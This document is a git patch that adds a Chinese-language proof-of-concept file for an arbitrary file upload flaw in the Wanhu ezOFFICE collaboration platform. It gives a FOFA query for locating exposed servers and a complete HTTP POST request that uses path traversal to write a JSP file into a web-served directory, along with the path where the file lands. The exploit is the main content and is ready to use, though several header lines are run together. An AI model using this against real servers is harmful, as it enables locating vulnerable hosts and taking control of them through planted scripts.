From 54a020fdb9ce96767c7f841e8ee4d3c410fc6d2e Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Fri, 15 Dec 2023 12:38:17 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E4=B8=87=E6=88=B7ezoffice=20wpsservle?=
 =?UTF-8?q?t=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0?=
 =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 万户ezoffice wpsservlet任意文件上传漏洞.md | 28 ++++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 万户ezoffice wpsservlet任意文件上传漏洞.md

diff --git a/万户ezoffice wpsservlet任意文件上传漏洞.md b/万户ezoffice wpsservlet任意文件上传漏洞.md
new file mode 100644
index 0000000..c18efa4
--- /dev/null
+++ b/万户ezoffice wpsservlet任意文件上传漏洞.md	
@@ -0,0 +1,28 @@
+## 万户ezoffice wpsservlet任意文件上传漏洞
+万户ezOFFICE协同管理平台是一个综合信息基础应用平台分为企业版和政务版。解决方案由五大应用、两个支撑平台组成，分别为知识管理、工作流程、沟通交流、辅助办公、集成解决方案及应用支撑平台、基础支撑平台。万户ezOFFICE协同管理平台wpsservlet接口存在任意文件上传。攻击者可上传恶意脚本文件获取服务器权限。
+
+
+## fofa
+```
+app="万户网络-ezOFFICE"
+```
+
+## poc
+```
+POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
+Host: x.x.x.x
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+Content-Length: 173Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Connection: close
+Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerpDNT: 1
+Upgrade-Insecure-Requests: 1
+
+--ufuadpxathqvxfqnuyuqaozvseiueerp
+Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
+
+<% out.print("sasdfghjkj");%>
+--ufuadpxathqvxfqnuyuqaozvseiueerp--
+```
+文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
+